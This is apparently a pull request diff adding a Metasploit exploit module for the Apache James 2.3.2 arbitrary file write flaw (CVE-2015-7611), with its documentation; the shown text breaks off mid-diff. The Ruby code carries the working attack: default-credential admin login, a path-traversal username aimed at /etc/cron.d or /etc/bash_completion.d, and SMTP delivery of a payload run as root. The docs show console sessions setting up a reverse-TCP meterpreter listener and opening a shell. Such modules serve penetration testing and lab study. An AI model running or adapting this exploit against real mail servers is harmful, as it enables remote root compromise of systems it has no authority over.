### PR TITLE
Add Apache James 2.3.2 Arbitrary File Write Exploit Module

### DIFF
--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -1,0 +1,77 @@
+## Vulnerable Application  
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:  
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
+  
+## Verification Steps  
+  1. Load the module:  
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec  
+```
+
+  2. Set remote and local options:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
+  target => 1  
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
+  rhosts => 192.168.224.164  
+  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
+  rport => 25  
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
+  lhost => 192.168.224.167  
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
+  lport => 4444  
+```
+
+  3. Set payload:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
+  payload => linux/x64/meterpreter/reverse_tcp  
+```
+
+  4. Check version and run exploit:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check  
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit  
+
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
+```
+
+  5. Set up and run listener (Can be done before running exploit):  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
+  payload => linux/x64/meterpreter/reverse_tcp  
+  msf5 exploit(multi/handler) > set lport 4444  
+  lport => 4444  
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
+  lhost => 192.168.224.167    
+
+  msf5 exploit(multi/handler) > run  
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444  
+  [*] Sending stage (3021284 bytes) to 192.168.224.164  
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  
+
+  meterpreter >  
+```
+
+## Options  
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
+  **RHOSTS:**  The IP address of the vulnerable server.  
+  **RPORT:**  The port number of the SMTP service.  
+
+## Targets
+```
+  Id  Name 
+  --  ----
+  0   Linux x86  
+  1   Linux x64  
+```
+
+## References  
+  1. <https://www.exploit-db.com/exploits/35513>  
+  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>

--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -104,6 +104,7 @@
   **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
   **RHOSTS:**  The IP address of the vulnerable server.  
   **RPORT:**  The port number of the SMTP service.  
+  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.  
 
 ## Targets
 ```

--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -1,38 +1,66 @@
-## Vulnerable Application  
-  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:  
-  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
-  
-## Verification Steps  
-  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the mail objects.</br></br>
-  __1.__ Load the module:  
+## Vulnerable Application
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
+  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
+  Instructions for installing the vulnerable application for testing can be found here:
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
+
+## Verification Steps
+  __1.__ Start msfconsole
+
+  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec
+
+  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport
+
+  __4.__ DO: Set the preferred payload
+
+  __5.__ DO: Run the check method to determine vulnerability
+
+  __6.__ DO: Run the exploit
+
+  __7.__ The payload will connect to the listener if the exploit is successful
+
+## Options
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
+  **RHOSTS:**  The IP address of the vulnerable server.
+  **RPORT:**  The port number of the SMTP service.
+  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
+
+## Scenarios
+  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
+  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
+  mail objects.
+
+  __1.__ Load the module:
 ```
-  msf5 > use exploit/linux/smtp/apache_james_exec  
+  msf5 > use exploit/linux/smtp/apache_james_exec
 ```
 
-  __2.__ Set remote and local options:  
+  __2.__ Set remote and local options:
 ```
-  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
-  target => 1  
-  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169  
-  rhosts =>  192.168.224.169  
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
+  target => 1
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
+  rhosts =>  192.168.224.169
 
-  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
-  lhost => 192.168.224.167  
-  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
-  lport => 4444  
-```
-
-  __3.__ Set payload:  
-```
-  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
-  payload => linux/x64/meterpreter/reverse_tcp  
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
 ```
 
-  __4.__ Check version and run exploit:  
+  __3.__ Set payload:
 ```
-  msf5 exploit(linux/smtp/apache_james_exec) > check  
-  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
-  msf5 exploit(linux/smtp/apache_james_exec) > exploit  
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
   
   [*] Started reverse TCP handler on 192.168.224.167:4444
   [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
@@ -41,79 +69,73 @@
   [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
 
   meterpreter >
-```  
-  
-  ---------------------------------------------------------------------------------------------  
-**If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.</br></br>
-  
-  __1.__ Load the module:  
-```
-  msf5 > use exploit/linux/smtp/apache_james_exec  
 ```
 
-  __2.__ Set remote and local options:  
+  ---------------------------------------------------------------------------------------------
+  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
+  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
+  /etc/bash_completion.d directory and the malicious user account.
+
+  __1.__ Load the module:
 ```
-  msf5 exploit(linux/smtp/apache_james_exec) > set target 0  
-  target => 0  
-  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
   rhosts => 192.168.224.164
 
-  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
-  lhost => 192.168.224.167  
-  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
-  lport => 4444  
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
 ```
 
-  __3.__ Set payload:  
+  __3.__ Set payload:
 ```
-  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
-  payload => linux/x64/meterpreter/reverse_tcp  
-```
-
-  __4.__ Check version and run exploit:  
-```
-  msf5 exploit(linux/smtp/apache_james_exec) > check  
-  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
-  msf5 exploit(linux/smtp/apache_james_exec) > exploit  
-
-  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
 ```
 
-  __5.__ Set up and run listener (Can be done before running exploit):  
+  __4.__ Check version and run exploit:
 ```
-  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
-  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
-  payload => linux/x64/meterpreter/reverse_tcp  
-  msf5 exploit(multi/handler) > set lport 4444  
-  lport => 4444  
-  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
-  lhost => 192.168.224.167    
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
 
-  msf5 exploit(multi/handler) > run  
-
-  [*] Started reverse TCP handler on 192.168.224.167:4444  
-  [*] Sending stage (3021284 bytes) to 192.168.224.164  
-  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  
-
-  meterpreter >  
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
 ```
 
-## Options  
-  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
-  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
-  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
-  **RHOSTS:**  The IP address of the vulnerable server.  
-  **RPORT:**  The port number of the SMTP service.  
-  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.  
+  __5.__ Set up and run listener (Can be done before running exploit):
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lport 4444
+  lport => 4444
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [*] Sending stage (3021284 bytes) to 192.168.224.164
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
+
+  meterpreter >
+```
 
 ## Targets
 ```
   Id  Name 
   --  ----
-  0   Bash Completion  
-  1   Cron  
+  0   Bash Completion
+  1   Cron
 ```
 
-## References  
-  1. <https://www.exploit-db.com/exploits/35513>  
+## References
+  1. <https://www.exploit-db.com/exploits/35513>
   2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>

--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -1,5 +1,5 @@
 ## Vulnerable Application  
-  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:  
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory. Instructions for installing the vulnerable application for testing can be found here:  
   https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
   
 ## Verification Steps  

--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -1,21 +1,20 @@
 ## Vulnerable Application  
-  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory. Instructions for installing the vulnerable application for testing can be found here:  
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:  
   https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
   
 ## Verification Steps  
-  1. Load the module:  
+  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the mail objects.</br></br>
+  __1.__ Load the module:  
 ```
   msf5 > use exploit/linux/smtp/apache_james_exec  
 ```
 
-  2. Set remote and local options:  
+  __2.__ Set remote and local options:  
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
   target => 1  
-  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
-  rhosts => 192.168.224.164  
-  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
-  rport => 25  
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169  
+  rhosts =>  192.168.224.169  
 
   msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
   lhost => 192.168.224.167  
@@ -23,13 +22,55 @@
   lport => 4444  
 ```
 
-  3. Set payload:  
+  __3.__ Set payload:  
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
   payload => linux/x64/meterpreter/reverse_tcp  
 ```
 
-  4. Check version and run exploit:  
+  __4.__ Check version and run exploit:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check  
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit  
+  
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
+  [*] Sending stage (3021284 bytes) to 192.168.224.169
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
+  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
+
+  meterpreter >
+```  
+  
+  ---------------------------------------------------------------------------------------------  
+**If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.</br></br>
+  
+  __1.__ Load the module:  
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec  
+```
+
+  __2.__ Set remote and local options:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 0  
+  target => 0  
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
+  rhosts => 192.168.224.164
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
+  lhost => 192.168.224.167  
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
+  lport => 4444  
+```
+
+  __3.__ Set payload:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
+  payload => linux/x64/meterpreter/reverse_tcp  
+```
+
+  __4.__ Check version and run exploit:  
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > check  
   [*] 192.168.224.164:25 - The target appears to be vulnerable.  
@@ -38,7 +79,7 @@
   [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
 ```
 
-  5. Set up and run listener (Can be done before running exploit):  
+  __5.__ Set up and run listener (Can be done before running exploit):  
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
   msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
@@ -68,8 +109,8 @@
 ```
   Id  Name 
   --  ----
-  0   Linux x86  
-  1   Linux x64  
+  0   Bash Completion  
+  1   Cron  
 ```
 
 ## References  

--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -21,10 +21,15 @@
 
 ## Options
   **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
   **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
   **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
+
   **RHOSTS:**  The IP address of the vulnerable server.
+
   **RPORT:**  The port number of the SMTP service.
+
   **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
 
 ## Scenarios
@@ -33,11 +38,13 @@
   mail objects.
 
   __1.__ Load the module:
+
 ```
   msf5 > use exploit/linux/smtp/apache_james_exec
 ```
 
   __2.__ Set remote and local options:
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > set target 1
   target => 1
@@ -51,12 +58,14 @@
 ```
 
   __3.__ Set payload:
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
   payload => linux/x64/meterpreter/reverse_tcp
 ```
 
   __4.__ Check version and run exploit:
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > check
   [*] 192.168.224.164:25 - The target appears to be vulnerable.
@@ -77,11 +86,13 @@
   /etc/bash_completion.d directory and the malicious user account.
 
   __1.__ Load the module:
+
 ```
   msf5 > use exploit/linux/smtp/apache_james_exec
 ```
 
   __2.__ Set remote and local options:
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > set target 0
   target => 0
@@ -95,12 +106,14 @@
 ```
 
   __3.__ Set payload:
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
   payload => linux/x64/meterpreter/reverse_tcp
 ```
 
   __4.__ Check version and run exploit:
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > check
   [*] 192.168.224.164:25 - The target appears to be vulnerable.
@@ -110,6 +123,7 @@
 ```
 
   __5.__ Set up and run listener (Can be done before running exploit):
+
 ```
   msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
   msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -183,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['ExploitPath'] == "cron.d"
       cron_cleanup
     else
-      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' to fully clean up exploit artifacts.")
+      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password 'exploit' to fully clean up exploit artifacts.")
     end
   end
 

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -12,18 +12,32 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
+      'Name'           => "Apache James Server 2.3.2 Insecure User Arbitrary File Write",
       'Description'    => %q{
-        To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
+        To use this module, start a listener using the given payload, host, and
+        port before running the exploit. After running the exploit, the payload
+        will be executed when a user logs into the system. This module exploits
+        a vulnerability that exists due to a lack of input validation when
+        creating a user. Messages for a given user are stored in a directory
+        partially defined by the username. By creating a user with a directory
+        traversal payload as the username, commands can be written to a given
+        directory. For this exploit, bash completion must be enabled to
+        gain code execution. This exploit will leave an Apache James mail
+        object artifact in the /etc/bash_completion.d directory and the
+        malicious user account.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'Matthew Aberegg', 'Michael Burkey' ],
+      'Author'         => [
+        'Palaczynski Jakub', # Discovery
+        'Matthew Aberegg',   # Metasploit
+        'Michael Burkey'     # Metasploit
+      ],
       'References'     =>
-        [
-          [ 'CVE', '2015-7611'],
-          [ 'EDB', '35513'],
-          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
-        ],
+      [
+        [ 'CVE', '2015-7611' ],
+        [ 'EDB', '35513' ],
+        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
+      ],
       'Platform'       => 'linux',
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
@@ -50,60 +64,55 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # Grab banner for SMTP service
     connect
-    banner = sock.get
-    if banner.include? "(JAMES SMTP Server 2.3.2)"
+    smtp_banner = sock.get_once
+    disconnect
+    # Grab banner for James Remote Administration tool
+    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
+    admin_banner = sock.get_once
+    disconnect
+    # Check that both SMTP and admin tool are accessable and vulnerable
+    if smtp_banner.include? "(JAMES SMTP Server 2.3.2)" and admin_banner.include? "JAMES Remote Administration Tool 2.3.2"
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Unknown
     end
-    disconnect
   end
 
   def execute_command(cmd, opts = {})
+    # Create malicious user (message objects for this user will now be stored in /etc/bash_completion.d)
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-
     connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
-
-    sock.get
-
+    sock.get_once
     sock.puts(username + "\n")
-    sock.get
-
+    sock.get_once
     sock.puts(password + "\n")
-    sock.get
-
+    sock.get_once
     sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
-    sock.get
-
+    sock.get_once
     sock.puts("quit\n")
     disconnect
 
+    # Send payload via SMTP
     connect
-
     sock.puts("ehlo admin@apache.com\r\n")
-    sock.get
-
+    sock.get_once
     sock.puts("mail from: <'@apache.com>\r\n")
-    sock.get
-
+    sock.get_once
     sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
-    sock.get
-
+    sock.get_once
     sock.puts("data\r\n")
-    sock.get
-
+    sock.get_once
     sock.puts("From: admin@apache.com\r\n")
     sock.puts("\r\n")
     sock.puts("'\n")
     sock.puts("#{cmd}\n")
     sock.puts("\r\n.\r\n")
-    sock.get
-
+    sock.get_once
     sock.puts("quit\r\n")
-    sock.get
-
+    sock.get_once
     disconnect
   end
 

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -74,15 +74,15 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
     smtp_banner = sock.get_once
     disconnect
-    unless smtp_banner =~ /JAMES SMTP Server/
+    unless smtp_banner.to_s.include? "JAMES SMTP Server"
       return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
     end
 
     # James Remote Administration Tool service check
-    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
+    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
     admin_banner = sock.get_once
     disconnect
-    unless admin_banner =~ /JAMES Remote Administration Tool/
+    unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
       return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
     end
 
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_james_admin_tool_command(cmd)
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
+    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
     sock.get_once
     sock.puts(username + "\n")
     sock.get_once
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     username = "../../../../../../../../etc/cron.d"
     password = "exploit"
     begin
-      connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=> "110" })
+      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => "110"})
       sock.get_once
       sock.puts("USER #{username}\r\n")
       sock.get_once

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     elsif target_version == vulnerable_version
       return CheckCode::Appears
     elsif target_version < vulnerable_version
-      return CheckCode::Detected("However,version #{version} of JAMES Remote Administration Tool may still be vulnerable")
+      return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
     end
   end
 

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -14,16 +14,22 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
       'Description'    => %q{
-        To use this module, start a listener using the given payload, host, and
-        port before running the exploit. After running the exploit, the payload
-        will be executed when a user logs into the system. This module exploits
-        a vulnerability that exists due to a lack of input validation when
-        creating a user. Messages for a given user are stored in a directory
-        partially defined by the username. By creating a user with a directory
-        traversal payload as the username, commands can be written to a given
-        directory. For this exploit, bash completion must be enabled to
-        gain code execution. This exploit will leave 2 Apache James mail
-        object artifacts in the /etc/bash_completion.d directory and the
+        This module exploits a vulnerability that exists due to a lack of input
+        validation when creating a user. Messages for a given user are stored
+        in a directory partially defined by the username. By creating a user
+        with a directory traversal payload as the username, commands can be
+        written to a given directory. To use this module with the cron
+        exploitation method, run the exploit using the given payload, host, and
+        port. After running the exploit, the payload will be executed within 60
+        seconds. Due to differences in how cron may run in certain Linux
+        operating systems such as Ubuntu, it may be preferable to set the
+        target to Bash Completion as the cron method may not work. If the target
+        is set to Bash completion, start a listener using the given payload,
+        host, and port before running the exploit. After running the exploit,
+        the payload will be executed when a user logs into the system. For this
+        exploitation method, bash completion must be enabled to gain code
+        execution. This exploitation method will leave an Apache James mail
+        object artifact in the /etc/bash_completion.d directory and the
         malicious user account.
       },
       'License'        => MSF_LICENSE,
@@ -42,25 +48,25 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
       [
-        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
-        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+        [ 'Bash Completion', {
+          'ExploitPath' => 'bash_completion.d',
+          'ExploitPrepend' => '' } ],
+        [ 'Cron', {
+          'ExploitPath' => 'cron.d',
+          'ExploitPrepend' => '* * * * * root ' } ]
       ],
       'Privileged'     => true,
       'DisclosureDate' => "Oct 1 2015",
-      'DefaultTarget'  => 0,
-      'CmdStagerFlavor'=> [ 'printf' ],
-      'DefaultOptions' =>
-        {
-          'DisablePayloadHandler' => 'true'
-        }
+      'DefaultTarget'  => 1,
+      'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
       ))
       register_options(
         [
           OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
           OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
-          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
+          Opt::RPORT(25)
         ])
-      deregister_options('SRVHOST', 'SRVPORT')
   end
 
   def check
@@ -100,8 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts = {})
-    # Create malicious user (message objects for this user will now be stored in /etc/bash_completion.d)
+  def execute_james_admin_tool_command(cmd)
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
     connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
@@ -110,34 +115,73 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.get_once
     sock.puts(password + "\n")
     sock.get_once
-    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
